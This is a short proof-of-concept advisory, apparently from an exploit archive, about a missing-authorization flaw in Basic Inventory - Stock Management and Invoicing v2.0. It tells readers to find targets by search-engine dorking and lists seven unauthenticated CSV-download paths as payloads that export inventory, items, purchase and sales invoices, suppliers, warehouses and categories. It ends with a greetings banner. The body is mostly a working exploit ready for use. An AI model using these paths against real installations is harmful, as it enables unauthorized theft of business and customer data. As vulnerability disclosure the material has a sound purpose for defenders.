====================================================================================================================================
| # Title     : Basic Inventory - Stock Management and Invoicing v2.0 Missing Authorization Vulnerability                          |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |
| # Vendor    : http://incevio.com                                                                                                 |  
| # Dork      : n/a                                                                                                                |
====================================================================================================================================

poc :

[+]  Dorking İn Google Or Other Search Enggine .

[+]  Basic Inventory - Stock Management and Invoicing v2.0 allows for unauthorized administrative access.

[+]  Use Payload : /basic-inventory/csv/download_csv/inventory

                  /basic-inventory/csv/download_csv/items
				  
				  /basic-inventory/csv/download_csv/invoice_purchase
				  
				  /basic-inventory/csv/download_csv/invoice_out
				  
				  /basic-inventory/csv/download_csv/supplier
				  
				  /basic-inventory/csv/download_csv/warehouse
				  
				  /basic-inventory/csv/download_csv/category
				  
[+]  http://127.0.0.1/demo.incevio.com/basic-inventory/csv/download_csv/inventory

====Greetings to :=====================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |
=======================================================================================================================================